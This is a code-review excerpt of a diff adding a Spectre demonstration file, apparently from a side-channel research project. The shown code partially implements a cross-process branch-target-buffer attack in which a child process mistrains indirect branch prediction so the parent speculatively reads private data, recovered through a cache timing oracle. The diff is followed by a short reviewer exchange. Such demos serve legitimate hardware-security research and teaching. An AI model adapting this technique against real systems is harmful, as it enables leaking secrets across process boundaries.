demos/spectre_v1_btb_ca.cc

```diff
@@ -0,0 +1,197 @@
+// the private storage.
+class DataAccessor {
+ public:
+  virtual char GetDataByte(size_t index) = 0;
+  virtual ~DataAccessor(){};
+};
+
+// PrivateDataAccessor returns private_data. Used only by the child (attacker).
+class PrivateDataAccessor : public DataAccessor {
+ public:
+  char GetDataByte(size_t index) override { return private_data[index]; }
+};
+
+// PublicDataAccessor returns public_data. Used only by the victim (parent).
+class PublicDataAccessor : public DataAccessor {
+ public:
+  char GetDataByte(size_t index) override { return public_data[index]; }
+};
+
+// Public data accessor. Used by the victim (parent). Leaks only public data.
+auto public_data_accessor =
+    std::unique_ptr<DataAccessor>(new PublicDataAccessor);
+
+// Private data accessor. Used by the attacker (child). Leaks private data.
+auto private_data_accessor =
+    std::unique_ptr<DataAccessor>(new PrivateDataAccessor);
+
+// On the victim (parent) it leaks data that is physically located at
+// private_data[offset], without ever loading it. In the abstract machine, and
+// in the code executed by the CPU, this function does not load any memory
+// except for what is in the bounds of `public_data`, and local auxiliary data.
+//
+// Instead, the leak is performed by indirect branch prediction during
+// speculative execution, the attacker (child) mistraining the predictor to
+// jump to the address of GetDataByte implemented by PrivateDataAccessor that
+// reads private data instead of public data.
+static char LeakByte(size_t offset) {
+  CacheSideChannel sidechannel;
+  const std::array<BigByte, 256> &oracle = sidechannel.GetOracle();
+  auto array_of_pointers =
+      std::unique_ptr<std::array<DataAccessor *, kAccessorArrayLength>>(
+          new std::array<DataAccessor *, kAccessorArrayLength>());
+
+  for (int run = 0;; ++run) {
+    // Only the parent needs to flush the oracle.
+    if (pid != 0) {
+      sidechannel.FlushOracle();
+    }
+
+    // Setup all pointers to use public_data_accessor on the victim and
+    // private_data_accessor on the attacker.
+    for (auto &pointer : *array_of_pointers) {
+      // This is a branchless equivalent of:
+      // pointer = pid == 0 : private_data_accessor.get()
+      //                    ? public_data_accesor.get();
+      // Parent (victim) uses public_data_accessor, child (attacker) uses
+      // private_data_accessor.
+      pointer = private_data_accessor.get() + static_cast<bool>(pid) * (
+          public_data_accessor.get() - private_data_accessor.get());
+    }
+
+    for (size_t i = 0; i < kAccessorArrayLength; ++i) {
+      DataAccessor *accessor = (*array_of_pointers)[i];
+
+      // We make sure to flush whole accessor object in case it is
+      // hypothetically on multiple cache-lines.
+      const char *accessor_bytes = reinterpret_cast<const char *>(accessor);
+      FlushFromCache(accessor_bytes, accessor_bytes + sizeof(DataAccessor));
```

Comment:
Why does the child/attacker flush its object?

Reply:
It does not need to flush it. Fixed.